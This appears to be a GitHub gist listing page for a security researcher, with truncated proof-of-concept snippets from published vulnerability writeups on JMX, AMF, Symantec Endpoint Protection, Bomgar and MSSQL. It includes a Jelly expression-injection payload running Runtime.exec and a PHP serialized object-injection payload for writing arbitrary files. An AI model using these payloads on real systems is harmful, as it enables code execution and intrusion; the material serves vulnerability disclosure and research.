Markus Wulftange mwulftange
mwulftange
/ JMX_RequiredModelMBean_File.java
Last active
March 23, 2023 10:30
JMX Exploitation Revisited (https://codewhitesec.blogspot.com/2023/03/jmx-exploitation-revisited.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // connect to MBean server | |
| String url = "service:jmx:rmi:///jndi/rmi://127.0.0.1:12345/jmxrmi"; | |
| JMXServiceURL serviceURL = new JMXServiceURL(url); | |
| Map env = new Properties(); | |
| MBeanServerConnection connection = JMXConnectorFactory.connect(serviceURL, env).getMBeanServerConnection(); | |
| // create ObjectName for new MBean | |
| ObjectName objectName = new ObjectName("Test:type=test"); | |
| try { |
mwulftange
/ exec.jelly
Created
September 28, 2017 12:20
Runtime.getRuntime().exec("xterm") in Jelly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <j>${context.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('xterm')}</j> |
mwulftange
/ Amf3ExternalizableUnicastRef.java
Last active
April 21, 2023 03:04
AMF – Another Malicious Format (http://codewhitesec.blogspot.com/2017/04/amf.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.ByteArrayInputStream; | |
| import java.io.ByteArrayOutputStream; | |
| import java.io.IOException; | |
| import java.util.Arrays; | |
| import flex.messaging.io.SerializationContext; | |
| import flex.messaging.io.amf.ActionContext; | |
| import flex.messaging.io.amf.ActionMessage; | |
| import flex.messaging.io.amf.AmfMessageDeserializer; | |
| import flex.messaging.io.amf.AmfMessageSerializer; |
mwulftange
/ SemAdministrator.xml
Last active
February 24, 2016 17:32
Compromised by Endpoint Protection: Legacy Edition (http://codewhitesec.blogspot.com/2016/02/symantec-endpoint-protection-legacy-edition.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <SemAdministrator | |
| CreationTime="1450248162172" | |
| EmailAddress="admin@localhost.local" | |
| Id="AF3C39A10A320801000000DBF200C60A" | |
| Name="admin" | |
| PasswordHash="21232F297A57A5A743894A0E4A801FC3" | |
| _d="false" | |
| _i="6F335DE8C0A80101003F6843927F3521" | |
| _t="1450248162172" | |
| _v="3"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Calls WshShell.Exec with c and kills the process tree after the specified timeout t | |
| ' Returns the created WshScriptExec object | |
| Function Exec(c, t) | |
| Dim s, e : Set s = CreateObject("WScript.Shell") : Set e = s.Exec(c) | |
| Do While e.Status = 0 | |
| Call s.Run("waitfor /t 1 OneSecond", 0, True) | |
| t = t - 1 | |
| If 0 >= t Then | |
| Call s.Run("taskkill /t /f /pid " & e.ProcessId, 0, True) | |
| Exit Do |
mwulftange
/ CommandLine.java
Last active
February 5, 2016 14:04
Java and Command Line Injections in Windows (http://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.util.Arrays; | |
| public class CommandLine { | |
| public static void main(String[] args) throws IOException { | |
| args = new String[] { | |
| "C:\\Temp\\PrintArguments.exe", | |
| "arg 1", |
mwulftange
/ BinaryFileHandler_handleRequest.java
Last active
August 29, 2015 14:26
SYM15-007: Symantec Endpoint Protection 12.1 (http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc) | |
| /* */ { | |
| /* 54 */ NodeList list = doc.getElementsByTagName("Response"); | |
| /* 55 */ Element root = (Element)list.item(0); | |
| /* 56 */ String action = (String)requestData.get("Action"); | |
| /* 57 */ String id = (String)requestData.get("GUID"); | |
| /* 58 */ String fileType = (String)requestData.get("FILE_TYPE"); | |
| /* 59 */ String newId = (String)requestData.get("NEW_GUID"); | |
| /* */ | |
| /* 60-187 skipped */ |
mwulftange
/ gist:263efd3b2bb833c2bd48
Last active
August 29, 2015 14:20
CVE-2015-0935: Deserialization of Untrusted Data in Bomgar Remote Support Portal 14.3.1 (http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| O:6:"Tracer":1:{s:12:"\0Tracer\0_log";O:6:"Logger":1:{s:13:"\0Logger\0_logs";a:1:{s:0:"";O:8:"Log_file":4:{s:9:"_filename";s:13:"<destination>";s:11:"_lineFormat";s:9:"<payload>";s:7:"_append";b:0;s:4:"_eol";s:0:"";}}}} |
mwulftange
/ administer-bulk-operations-permissions.sql
Last active
December 5, 2018 06:53
Reading/Writing files with Transact-SQL's OPENROWSET (http://codewhitesec.blogspot.de/2015/06/reading-and-writing-files-with-mssql-openrowset.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SELECT HAS_PERMS_BY_NAME(null, null, 'ADMINISTER BULK OPERATIONS') |
mwulftange
/ Exec.java
Created
March 3, 2015 09:22
$@|sh – Or: Getting a shell environment from Runtime.exec (http://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.*; | |
| public class Exec { | |
| public static void main(String[] args) throws IOException { | |
| Process p = Runtime.getRuntime().exec(args[0]); | |
| byte[] b = new byte[1]; | |
| while (p.getErrorStream().read(b) > 0) | |
| System.out.write(b); |